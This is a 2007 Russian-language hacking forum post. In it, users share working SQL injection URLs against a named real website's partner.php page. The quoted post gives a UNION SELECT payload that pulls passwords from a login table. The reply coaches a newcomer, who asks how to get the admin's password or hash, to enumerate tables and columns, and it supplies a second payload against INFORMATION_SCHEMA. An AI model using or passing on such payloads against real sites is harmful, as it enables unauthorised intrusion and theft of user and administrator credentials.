24.11.2007, 20:01
|
|
Познающий
Регистрация: 10.05.2007
Сообщений: 38
Провел на форуме:
453576
Репутация:
100
|
|
Сообщение от Mike 007
Код:
http://www.polimernm.ru/partner.php?pid=-1+union+select+1,pass,user(),6,5+from+login/*
я в этом деле новичок
для чего выкладывают u15691@10.10.10.205 и что оно даёт?
Что делать дальше? как узнать пароль\хеш админа? или юзверя какого нибудь? Дальше надо прочитать хоть пару статей про sql-inj....
Смотрим таблицы,далее колонки....и будет тебе счастье)
Код:
http://www.polimernm.ru/partner.php?pid=-1+union+select+1,TABLE_NAME,3,4,5+from+INFORMATION_SCHEMA.TABLES+limit+1,1/*
Последний раз редактировалось 5taY3r; 24.11.2007 в 20:08..
|
|
|